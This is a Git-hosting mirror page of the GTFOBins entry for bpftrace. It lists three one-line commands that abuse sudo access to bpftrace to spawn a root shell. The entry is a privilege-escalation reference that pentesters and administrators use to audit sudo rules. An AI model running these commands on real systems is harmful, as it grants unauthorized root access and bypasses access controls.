This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-19 18:15:13 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
b6f19473545f7721c044d6c614853a1a971c2640
GTFOBins.github.io
/
_gtfobins
/
bpftrace.md
Andrea Cardaci
1f9dbbf6eb
Improve bpftrace sudo shell
2020-01-03 14:11:37 +01:00
260 B
Raw
Blame
History
functions
functions
sudo
code
sudo bpftrace -e 'BEGIN {system("/bin/sh");exit()}'
code
TF=$(mktemp) echo 'BEGIN {system("/bin/sh");exit()}' >$TF sudo bpftrace $TF
code
sudo bpftrace -c /bin/sh -e 'END {exit()}'
Reference in New Issue
View Git Blame
Copy Permalink